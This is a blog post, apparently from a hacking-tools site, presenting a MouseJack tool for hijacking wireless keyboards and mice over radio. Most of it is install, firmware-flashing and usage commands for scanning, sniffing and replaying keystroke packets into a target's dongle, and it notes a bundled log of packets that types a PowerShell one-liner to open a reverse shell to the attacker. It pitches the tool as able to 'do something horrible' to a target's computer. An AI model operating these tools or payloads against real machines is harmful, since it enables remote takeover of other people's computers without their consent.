MouseJack – A Tool To Hijack Wireless Mouse And Keyboard With Reply/Transmit PoC

MouseJack Tool To Hijack Wireless Mouse And Keyboard With ReplyTransmit PoC xploitlab

MouseJack is very dangerous tool because with this tool you can hijack the wireless mouse or keyboard and do something horrible in target computer. Especially now many people use wireless mouse or keyboard. The attacker can take control target computer from a distance. Learn the hacker ways and protect yourself from that.

What Is MouseJack ??

MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. These peripherals are ‘connected’ to a host computer using a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim’s computer by transmitting specially-crafted radio signals using a device which costs as little as $15.

An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer, without physically being in front of it, and type arbitrary text or send scripted commands. It is therefore possible to perform rapidly malicious activities without being detected.

The MouseJack exploit centers around injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, and keystrokes are often encrypted (to prevent eavesdropping what is being typed). However the MouseJack vulnerability takes advantage of affected receiver dongles, and their associated software, allowing unencrypted keystrokes transmitted by an attacker to be passed on to the computer’s operating system as if the victim had legitimately typed them.
 
For more information on the MouseJack vulnerability, you can watch the video, read the MouseJack technical white paper, and view the list of affected devices.

The public advisories can be found here, and have been registered with CERT.

Source Code

This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

Install & Setup

Requirements

  • SDCC (minimum version 3.1.0)
  • GNU Binutils
  • Python
  • PyUSB
  • platformio

Install dependencies on Ubuntu :

§  sudo apt-get install sdcc binutils python python-pip
§  sudo pip install -U pip
§  sudo pip install -U -I pyusb
§  sudo pip install -U platformio 

Supported Hardware

The following hardware has been tested and is known to work.

  • CrazyRadio PA USB dongle
  • SparkFun nRF24LU1+ breakout board
  • Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)

Initialize the submodule

§  git submodule init
§  git submodule update 

Build the firmware

§  cd nrf-research-firmware

§  make

Flash over USB

nRF24LU1+ chips come with a factory programmed bootloader occupying the topmost 2KB of flash memory. The CrazyRadio firmware and RFStorm research firmware support USB commands to enter the Nordic bootloader.

Dongles and breakout boards can be programmed over USB if they are running one of the following firmwares :

  • Nordic Semiconductor Bootloader
  • CrazyRadio Firmware
  • RFStorm Research Firmware

To flash the firmware over USB :

§  cd nrf-research-firmware

§  sudo make install

Flash a Logitech Unifying dongle

The most common Unifying dongles are based on the nRF24LU1+, but some use chips from Texas Instruments. This firmware is only supported on the nRF24LU1+ variants, which have a model number of C-U0007. The flashing script will automatically detect which type of dongle is plugged in, and will only attempt to flash the nRF24LU1+ variants.

To flash the firmware over USB onto a Logitech Unifying dongle :

§  cd nrf-research-firmware

§  sudo make logitech_install

Flash a Logitech Unifying dongle back to the original firmware

Download and extract the Logitech firmware image, which will be named RQR_012_005_00028.hex or similar. Then, run the following command to flash the Logitech firmware onto the dongle :

§  cd nrf-research-firmware

§  sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex]

Flash over SPI using a Teensy

If your dongle or breakout board is bricked, you can alternatively program it over SPI using a Teensy.

This has only been tested with a Teensy 3.1/3.2, but is likely to work with other Arduino variants as well.

Build and Upload the Teensy Flasher

§  cd nrf-research-firmware

§  platformio run –project-dir teensy-flasher –target upload

Connect the Teensy to the nRF24LU1+

MouseJack Tool To Hijack Wireless Mouse And Keyboard With ReplyTransmit PoC nRF24LU1+ xploitlab

Flash the nRF24LU1+

§  cd nrf-research-firmware

§  sudo make spi_install

Usage

scanner

Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.

usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]
optional arguments: -h, --help show this help message and exit -c N [N ...], --channels N [N ...] RF channels -v, --verbose Enable verbose output -l, --lna Enable the LNA (for CrazyRadio PA dongles) -p PREFIX, --prefix PREFIX Promiscuous mode address prefix -d DWELL, --dwell DWELL Dwell time per channel, in milliseconds

Scan for devices on channels 1-5

§  ./nrf24-scanner.py -c {1..5}

Scan for devices with an address starting in 0xA9 on all channels

§  ./nrf24-scanner.py -p A9

sniffer

Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file

usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o OUTPUT, --output OUTPUT                 Output file to log the packets
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log

§  ./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

replay/transmit

Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.

usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o INPUT_FILE, --input INPUT_FILE          Input file that has the packets to sned
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel

§  ./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

network mapper

Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.

usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Known address
  -p PASSES, --passes PASSES                 Number of passes (default 2)
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Map the star network that address 61:49:66:82:03 belongs to

./nrf24-network-mapper.py -a 61:49:66:82:03

continuous tone test

The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.

This script will cause the transceiver to transmit a tone on the first channel that is passed in.

usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]
 
optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles) 

Transmit a continuous tone at 2405MHz

§  ./nrf24-continuous-tone-test.py -c 5

packet generator script

This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.

§  usage: ./keymapper.py

Log files

The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.

The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo

A demo of exploiting a Windows machine can be found here :


You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *

fifteen + 19 =